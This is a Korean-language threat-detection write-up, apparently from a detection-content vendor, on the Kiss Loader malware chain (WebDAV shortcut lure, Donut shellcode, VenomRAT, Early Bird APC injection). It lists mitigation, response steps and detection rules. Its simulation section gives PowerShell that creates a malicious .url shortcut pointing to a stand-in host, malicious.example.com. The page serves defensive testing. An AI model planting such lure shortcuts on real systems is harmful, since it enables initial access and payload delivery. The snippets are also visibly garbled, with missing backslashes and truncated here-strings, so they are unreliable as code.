팔로우 
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
연구 진행자 G DATA 보안 센터 는 새로 발견된 로더 Kiss Loader를 분석합니다. 이 글은 TryCloudflare 터널을 통해 노출된 WebDAV 저장소로 포인팅하는 Windows 바로 가기를 통해 배포되는 새로 식별된 로더, Kiss Loader에 대해 설명합니다. 로더가 실행되면 Donut으로 생성된 쉘코드를 복호화하고 VenomRAT 및 Kryptik 컴포넌트와 같은 페이로드를 가져온 후 Early Bird APC 주입을 통해 실행합니다 explorer.exe에서. 분석 중 연구자는 Notepad 창을 통해 맬웨어 운영자와 직접 상호작용을 경험하며 Early Bird 주입 방법의 사용을 확인했습니다. 이 사례는 도구의 빠른 진화를 강조하며 활성 맬웨어를 처리할 때 강력한 격리가 필요함을 시사합니다.
조사
연구자들은 처음 바로 가기를 통제된 실험실에서 실행하고 WSH 스크립트, JScript 컴포넌트, 배치 파일, Python 기반 로더를 통해 실행 체인을 추적했습니다. 그들은 Donut으로 생성된 쉘코드의 사용을 확인하고 내장 페이로드를 추출하며, 최종 주입 방법을 문서화했습니다. 이 방법은 중지된 explorer.exe 프로세스에 APC를 대기열에 추가하는 것입니다. 세션 내내, 팀은 맬웨어 흐름 내에 남겨진 개발자 메시지와 상세한 런타임 출력을 포착했습니다. 운영자와의 짧은 실시간 통신은 기술과 로더의 활성 개발 상태를 추가로 확인했습니다.
완화
조직은 TryCloudflare와 같은 공개 터널링 플랫폼을 통해 제공되는 WebDAV 트래픽을 제한하거나 검사하여야 하고, 자동 실행을 비활성화하며 .url 바로 가기 파일 및 사용자 접근 가능 시작 경로에서 스크립트 및 배치 파일의 엄격한 실행 제어를 적용해야 합니다. 엔드포인트 방어는 Early Bird APC 주입 동작을 탐지해야 하며 대기 중인 APC를 수신하는 중지된 프로세스를 살펴야 합니다. 애플리케이션 허용 목록은 알려지지 않은 Python 로더와 Donut 기반 쉘코드를 차단하기 위해 최신 상태를 유지해야 합니다.
대응
Kiss Loader 활동이 탐지되면 즉시 엔드포인트를 격리하고, 의심스러운 explorer.exe 상태로 시작된 프로세스를 종료하고 법의학 검토를 위해 메모리를 캡처하세요. 조사자는 관련 WebDAV 인프라를 식별하고 차단하며, VenomRAT, Kryptik 및 추가 드롭 페이로드를 호스트에서 스캔하고, 잠재적으로 노출된 자격 증명을 회전해야 합니다. 그 후 다른 침입 시도를 위해 로깅을 검토하고, 새로운 지표를 모두 추가하여 탐지 규칙을 업데이트해야 합니다.
공격 흐름
탐지
가능한 검색 / Search-MS URI 프로토콜 핸들러 악용 (cmdline 통해)
보기
이중 확장자가 있는 인터넷 바로 가기 파일 생성됨 (file_event 통해)
보기
LOLBAS WScript / CScript (프로세스_생성 통해)
보기
탐지할 IOCs (HashSha256): Kiss Loader 분석 중 위협 행위자와의 실시간 상호작용
보기
explorer.exe에서 조기 APC 주입 [Windows 프로세스 생성]
보기
WebDAV 바로 가기 파일을 통한 최초 접근 시도 [Windows 파일 이벤트]
보기
시뮬레이션 실행
선행 조건: 텔레메트리 및 기준선 사전 비행 점검이 통과해야 합니다.
-
공격 내러티브 및 명령:
공격자는 피해자 워크스테이션에 제한적인 접근만 가진 상태에서 횡적 이동을 위한 발판을 마련하고자 합니다. 그들은 DKM_DE000922.pdf.url 라는 이름의 악성 Windows 인터넷 바로 가기를 제작하며, 이 바로 가기는 악성 WebDAV 공유로 연결됩니다 (http://malicious.example.com/webdav/evil.pdf). 사용자가 바로 가기를 두 번 클릭하면 시스템이 자동으로 WebDAV 리소스를 장착하려 시도하여 피해자가 기존의 이진 파일을 실행하지 않고 페이로드를 다운로드하게 됩니다. 이 바로 가기 생성은 탐지 규칙에 일치하는 파일 생성 이벤트를 생성합니다.
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@powershell # 바로 가기가 드롭될 경로 (예: 사용자의 데스크톱) $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # WebDAV 공유로 포인팅하는 악성 .url 파일의 내용 $maliciousContent = @"# 파일 쓰기 – 이 작업은 탐지 규칙을 트리거해야 합니다 Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII -
회귀 테스트 스크립트: 아래 스크립트는 탐지 트리거 텔레메트리를 생성하는 데 필요한 정확한 단계를 재생합니다.
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@powershell # --------------------------------------------------------- # 회귀 테스트 – WebDAV .url 파일에 대한 Sigma 규칙 트리거 # --------------------------------------------------------- # 1. 대상 위치 정의 (현재 사용자 데스크톱) $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # 2. 악성 바로 가기 내용 생성 $urlPayload = @"# 3. 바로 가기 쓰기 (이것은 FileCreate 이벤트를 발생시킵니다) Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII Write-Host "악성 .url 바로 가기가 $targetFile에 생성되었습니다" -
정리 명령: 검증 후 악성 바로 가기를 삭제합니다.
powershell $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" if (Test-Path $maliciousPath) { Remove-Item -Path $maliciousPath -Force Write-Host "악성 바로 가기가 정리되었습니다." } else { Write-Host "악성 바로 가기를 찾을 수 없음; 정리할 것이 없습니다." }